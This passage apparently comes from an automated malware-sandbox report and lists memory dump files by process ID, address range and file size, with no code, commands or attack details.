memory/4704-280-0x0000000000860000-0x0000000000861000-memory.dmpFilesize
4KB
-
memory/4760-249-0x0000000000880000-0x0000000000881000-memory.dmpFilesize
4KB
-
memory/4760-237-0x0000000000000000-mapping.dmp
-
memory/4760-274-0x000000001B6C0000-0x000000001B6C2000-memory.dmpFilesize
8KB
-
memory/4928-610-0x0000020D78382000-0x0000020D78384000-memory.dmpFilesize
8KB
-
memory/4928-572-0x0000020D78380000-0x0000020D78382000-memory.dmpFilesize
8KB
-
memory/4944-605-0x000001EEC1290000-0x000001EEC1292000-memory.dmpFilesize
8KB
-
memory/4944-634-0x000001EEC1296000-0x000001EEC1298000-memory.dmpFilesize
8KB
-
memory/4944-602-0x000001EEC1293000-0x000001EEC1295000-memory.dmpFilesize
8KB
-
memory/4960-257-0x0000000000000000-mapping.dmp
-
memory/5104-584-0x0000000005C00000-0x0000000005C01000-memory.dmpFilesize
4KB
-
memory/5132-513-0x0000000004D00000-0x0000000004D01000-memory.dmpFilesize
4KB
-
memory/5144-429-0x0000000005E60000-0x0000000005E61000-memory.dmpFilesize
4KB
-
memory/5144-361-0x0000000000000000-mapping.dmp
-
memory/5152-289-0x0000000000000000-mapping.dmp
-
memory/5180-445-0x0000000001980000-0x0000000001982000-memory.dmpFilesize
8KB
-
memory/5224-293-0x0000000000000000-mapping.dmp
-
memory/5244-362-0x0000000000000000-mapping.dmp
-
memory/5308-363-0x0000000000000000-mapping.dmp
-
memory/5380-335-0x0000000000400000-0x000000000043C000-memory.dmpFilesize
240KB
-
memory/5380-334-0x0000000000000000-mapping.dmp
-
memory/5380-345-0x00000000050F0000-0x00000000050F1000-memory.dmpFilesize
4KB
-
memory/5380-340-0x00000000029B0000-0x00000000029B1000-memory.dmpFilesize
4KB
-
memory/5408-309-0x0000000000000000-mapping.dmp
-
memory/5452-338-0x00000000006B0000-0x00000000006B1000-memory.dmpFilesize
4KB
-
memory/5452-314-0x0000000000000000-mapping.dmp
-
memory/5452-367-0x0000000005080000-0x0000000005081000-memory.dmpFilesize
4KB
-
memory/5504-320-0x0000000000000000-mapping.dmp
-
memory/5504-348-0x0000000005C40000-0x0000000005D8A000-memory.dmpFilesize
1.3MB
-
memory/5536-324-0x0000000000000000-mapping.dmp
-
memory/5536-332-0x0000000000D70000-0x0000000000D72000-memory.dmpFilesize
8KB
-
memory/5588-325-0x0000000000000000-mapping.dmp
-
memory/5608-331-0x0000000000A00000-0x0000000000A01000-memory.dmpFilesize
4KB
-
memory/5608-326-0x0000000000000000-mapping.dmp
-
memory/5608-351-0x0000000005450000-0x0000000005451000-memory.dmpFilesize
4KB
-
memory/5608-342-0x0000000005410000-0x0000000005437000-memory.dmpFilesize
156KB
-
memory/5632-327-0x0000000000000000-mapping.dmp
-
memory/5720-587-0x0000000000A20000-0x0000000000A29000-memory.dmpFilesize
36KB
-
memory/5728-600-0x00000000015D0000-0x00000000015D2000-memory.dmpFilesize
8KB
-
memory/5800-391-0x0000000000000000-mapping.dmp
-
memory/5808-390-0x0000000000000000-mapping.dmp
-
memory/5928-341-0x0000000000000000-mapping.dmp
-
memory/5996-411-0x0000000000000000-mapping.dmp
-
memory/6072-402-0x0000000000000000-mapping.dmp
-
memory/6080-422-0x0000000000690000-0x0000000000691000-memory.dmpFilesize
4KB
-
memory/6080-405-0x0000000000000000-mapping.dmp
-
memory/6108-354-0x0000000000000000-mapping.dmp